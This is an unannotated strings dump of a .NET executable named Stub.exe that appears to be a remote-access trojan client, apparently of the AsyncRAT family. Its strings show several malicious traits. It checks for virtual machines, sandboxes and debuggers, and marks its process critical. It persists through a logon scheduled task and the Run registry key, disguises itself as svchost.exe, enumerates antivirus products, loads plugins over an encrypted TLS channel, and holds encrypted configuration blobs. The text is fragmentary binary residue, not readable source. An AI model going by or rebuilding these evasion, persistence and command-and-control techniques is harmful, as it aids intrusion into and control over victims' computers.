!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
YjgDZUlCWorsQLA
RTuGgfawTwYYA
tKvOmTuqBZvLMScA
TgezzPuUnedtA
TadujiHrazZVqczA
StQNHnCEgRFB
xkxQjDUuLGzIB
ASAjpnvTQjrHXB
QUFWnkQYqjeB
aqMLSqTUpeB
pUDwvNroMhOgB
manAasvBhB
XChFYXqTzwUyB
YDlROtMjpzJC
PnkjslERLUC
lzYIfFOiwUC
ZkFfWcpkWolZC
bWdqqKVlCfrFoifC
qbwaMawbCOdpC
BOQmkpOlsC
CXffKDaAgltC
bUNzbCHAUhzC
iqHaGmnfoWsFCD
MapNameToOID
get_FormatID
CXbfJsignEBlSD
heEzdtufiTD
smMBajrrzsRgD
NIiZxyAUqifqD
OlpRaqbKmChwD
qsbyGyRXzuRPE
HZxMcfdGRE
EMAgGodoxHhRE
KkVClptTbFiE
mMfgHyarcdlqE
UZmISQeEnafOBF
KzANgjfFFBEtTEF
VuaEdzRgDEFwpNF
NUYdygFNyQF
eEaXBYueufIjF
YRkyGUIHanByF
lxhRNMSUkRXyF
bENjkosfUqaNpsyF
ioAmThMljleAG
FxerwMEdPASJkDG
NVxVjTAxbGJG
IQxcFbjolbOG
ytcdPKnLcXXlTG
qHnDJNWHEBAiFXG
eKotcyUKwlYG
MCMjEFOWYSuG
YVwwjBtZpLBmkVH
qNMXPKpUwlpH
hLEcGmdsxVrH
cJWIDYpaHuH
get_ASCII
mDqZFWLMMI
IeOSizdEkFsUnXQI
DEeXBwmzpsepCmI
ikEYIKyyovCJ
tnnQuWjPZIkkHJ
NlOBBKcKrmyPJ
OAPQtauNjoTJ
QwaTtRRArrOfJ
bIATPscjgzomJ
ZKISSuKLShoJ
jpiLgCDIwMtpJ
FHRiuOjcbRGDtJ
MXpqnqtTmjQGnVYGK
LbIXeXxQEONRIK
abieCPmLpRgOK
ZFADqGvNakYgWK
NDuLjxISUamK
WHgfwPydnK
iCmLuuCxeMODL
NLsdSlgrMTZPGL
ddycHBbnQWRRL
VawvkUSUgrjL
bhGNbbErArCVkL
wUeELJzpwL
PNVrhEXNvOAM
NaGWfyCYhIM
AajETBlwTrlMM
NxcMOJKOfbSM
hGYLipjqiXMbM
JwOwjTyhzOdM
dTZimtKqgM
GALWZeWfmxTwZlM
xdiverYJlorlM
fAGRmrMTYiSLHN
OWGIJcPaEhaLN
XRsqHMpdrZN
jruFQLPfjiN
tJcCYRUEoN
cHdGoxUGkmvN
wQtPUNWDEHlKOAO
BlqsQtjBotcDO
jXKqPqKoeHO
System.IO
hSxWCSdFfutZO
VOjEMVlVolEgO
JxFSWUaYwlwiO
REWqVuqgqYOujjO
JuubXWDmZmAkO
nnBQSonSyRqO
wrdEYWcquO
VuNEEciaZKLDP
NoAoWNlcOQLP
DYxhPuoHoitP
hWkFtxDGMBGptP
FPTNaruktpdrAQ
yaukojVmIQ
AMkoqXFCPnQ
oFvwhRwVUIR
LNMfFzoAfR
fmNilSRiEiR
EjfCAPhsQOijR
bPBMMZQDLwMqR
mHVvEUiDQtpvR
yaqNwqhSAS
IsmOMAyCwDSTDS
XqNEVSuTpUNS
idqmZSOUQS
sQChnQyUHwixTS
HjHotlZzSavLdXS
oRlsYgVoJYS
nrnogflFYngS
uaObbjYwciS
ojXoGshrRLYnmS
RHmRvxNGGXnS
omTQeXnpYwFQPvS
AaXOMOsZNNoaFT
qBgOJpETBnHT
frUnnhvRIfTNT
UnAoHQldMsEzGOT
XtNDhwWfzWT
YRqcKeJpkT
JtFPtFtZGuT
yopxDmmwvYAU
TKykALTggfU
lAPQpTQlwvU
fYuloiFNxDV
get_IV
set_IV
GenerateIV
osMvKGBMZyUbRV
kenUCJdSyJPiV
fUvpMFFLrTVGW
UICIiQiYXBCLJW
bgUxNJonWRW
wMEnfPlcPmVW
edyJASvDEZZMaW
SqDFNvywdjW
VFfvXyCmxrAdXqnW
rDXEtslFQPGCX
ckQuiNeWHGX
tPnWjMroqiGX
bPYRrUXNZDcxTX
uKWMNCXEbkX
FyspPXcXgrmxvX
OUaZAyBDcczX
AuYPnOMyiIIOJY
CjsfIJyrHjTNY
GeaTDxCsOrCYZY
axZMlSLrGQysY
ZsQYvUkZBgDVBZ
gCTlqFZeNyFirEZ
uIwcCyulaFtlsfFZ
zAfYDLkMRZ
KjmcpGLfPClZ
SzYIIgOnmxlZ
SVFssoVGFTjhzZ
value__
rieIJLDnFHEa
dGwzjfyOSlFOa
qSoXlpBTOa
whFGOdRLRxlqdInOa
hYSewhAsJLRjlPa
ehDooLcFnfya
OpFNAbCuEiWEBb
bqKHTWxYLaDb
CPcRkKiertHb
xcEIuZqvOaOCbTb
aSvVTigTAxDqab
pNKAnDSjtdb
mscorlib
sGtmcfVkSKaob
BSiDoOEWDpb
QObTMDEzSqb
aoddRNapZQbLMc
bnUZvUUnUc
LPwbkcWPkVmNLIXc
IixrGCrBrJzgc
System.Collections.Generic
Microsoft.VisualBasic
zrJtLhgtmiijc
ErQDJNJLqPkc
uxkbtSgLZXwmc
get_SendSync
uwErcxcTlRuhlxUuc
gCmVjwJAVkdwc
ZFPuHdsChwc
txsSbNLlQtxc
jiggVnrvYkaoOd
zAZdthHJoOPaXd
OPuzbBKnaXd
EndRead
BeginRead
Thread
QJrbBvgTbd
FelEgluvdd
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
sZssVevzHBfd
SEtMjSbFGKgd
get_Guid
rerJnWBMRGekd
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
VePJWRwIrKkod
haTYmRUrJOGsd
WVeBzoTraQhnud
PdiiGVrIpqVTe
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
qrfGidkMeXxSpoje
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
uanKzgmpvXvgYete
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
qZrMYCUlmwJTf
HICoxPFqtBmff
cakjUPvDWxKg
YoYcWtPGUbkHiPg
xgSKrruncg
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
oxaNmKtyIRxrg
UcmdhaTkWEqYryrg
lNOpHRimMJrsxg
pyuvWQSPgYBh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
YPclscmmdkth
zhfeebQHQdAi
fZJRmHVSxOtGi
UHsdULiovKi
ShkropDsNDBQi
sYbwnmAlGHdi
ZIXZcmVOPdi
ZcBPqcGbioVJmbfli
CiKpbNnIyNri
EhuRUCvavGBj
WpgLERELDZCJKbUALj
AArtwpIqbXj
XZtqpBuveTuZj
UAimPKMMdj
BwbyutEMmj
oteiawUEEUtj
nGPolBAJOkwj
PoltSrEbdTk
GaXwwEaKYyXk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
oMcwnmXBOsjk
NdIizLKaOGJPok
AkVNkotzRNqk
HwoigDrSBrk
raOpJHECXzk
NlXaClTzELLuKl
HVftfdYXLRl
PzFjXwnErAzGUl
eYAXOSZlaUwMWl
YVdUzQImZNgoAal
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
dZeZcHMpcdfSzfl
kernel32.dll
user32.dll
ntdll.dll
LepOapyiQcAml
hAZXFYGwCml
fHraumpsaBeVsl
ROSmLAEMGowJzXm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
zRYqfFnhCfm
ZlSEZgeHfm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
uFbyOtWLUvWim
Random
vTdMacGercqm
ICryptoTransform
qTCtHogNyqpxm
QdbyAYboRHoHn
NzBfbllHWVNn
mBcCwdryhSn
ToBoolean
X509Chain
AppDomain
get_CurrentDomain
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
xPumpujAdkvGlon
hETNYKCGoICo
gpdVphmOQhKbo
WDwtibUFdvdfo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
eNoUqjJVPho
Microsoft.CSharp
EWrrxNuprp
pjeDahkDotRup
NfcvlShoEzp
fsRspOGXYIazp
GqoPuEfvjFAHPGq
aWXVDltuoGq
zGJoidNpIlMJq
aqOaazhNLq
bmbbidTPgVq
fQazXGFbxjVwVq
vijxxaIQEOlq
System.Linq
MXcoUSvRTpBZpq
rdikZMyMJeLUtq
GDeEUFmDsesxyq
JqCOLxbytbHOFNXr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
VrQaPLnMvZpr
IntPtr
HtwBNvsuhyNyr
cJmfMhZklzwCs
OyxtOoozecs
System.Diagnostics
eenPcUUXpcs
gHssNHqBmds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
eiFMECKDjkls
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
VTDkbZBzIGws
CkNNzcdUKOVt
OFBYYnWEsAOWt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
Collect
Connect
arRIfABJxjacdt
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
vrDADmyFjt
IAsyncResult
ToUpperInvariant
WebClient
AsyncClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
iUmCykchvsUu
PoSVxwXIJXEWu
cluaBSqXyNTVgWu
EBNvJkZrau
OwvVPareBhrbu
jeenKmwycnu
lAbhQVWQDxIJwjou
arfDwhIRQbGRLqu
spPBLvJGAkFv
tJyTXVUCLuav
UYHLlUmKByxpdv
YaIQqFnOvnWAw
iqtufOhUWUMlAw
ncJnidQEOwFw
gvkFWdtqCSJOw
RHdYqekChVSmWw
ggmwzBMmhw
GetForegroundWindow
set_CreateNoWindow
WfsikKYeTPGxw
wfquPCCcYduAx
CexjhPtteLyQHx
VgsBIdyuIx
uVXJfFrambXx
BKAJskggGdXfdx
gRxJGXgmpvdx
GlstiuFfLjx
rjCpgRovCYqx
VpXOFdwtKfsx
uTfmguspeWJysx
unylzmiNjxx
HixAUHQhpxx
DmdPkadsATIEdUUDy
KPKhvGBeVQy
jaTDUQtcloyVy
InitializeArray
ToArray
get_AsArray
yHXuuBUATcy
ECkbNBfDdvebcy
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
NCLkstLFTHHfy
System.Security.Cryptography
GzkRtUWHNHjy
EXjlrWGpPIhky
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
nfxzNBqXvy
MVhfyvYaPJaFhGuyy
GYXewhbIqiNPMBJDz
OhVCCGHloIueQHz
WyOVopsWSz
bVUYGLkPVz
wmixDuRQqbAHZz
QcyHrxjyDaz
eLQBwJZIMNhz
RSPNjQpHMHvIbrz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
eqybX9GcSKDe09CfDYRj1AnaXMqMHHGu2UzT1G2mkNoRCoY28vIN5c9kEIe9Q7xzmKdiKPOEb2o+av1SRymMsQ==
pT331GIOWS9mmcpQpJ4HI6DER8D0dY0A9aJKzX2oNsZktU8Dx/+SzbzVJgOIs7I6Cua9edO2ewCb7b+3syn7Iw==
M2swwoQa+9X1gLbkpibakuaChr1r8A5Sr8EAloCx/Rc+wSKp3juOX184eb1c13RkyoOKbWK4SV+VIbtrXVinFw==
m7nogV1tlYD8nhGL4NSrskHVTbyIk03kFfLqYLAmub6LSwqTl25Wy6NWPy+64jrSpAQBRxuz2xTss6TDunPDUg==
%AppData%
svchost.exe
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
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0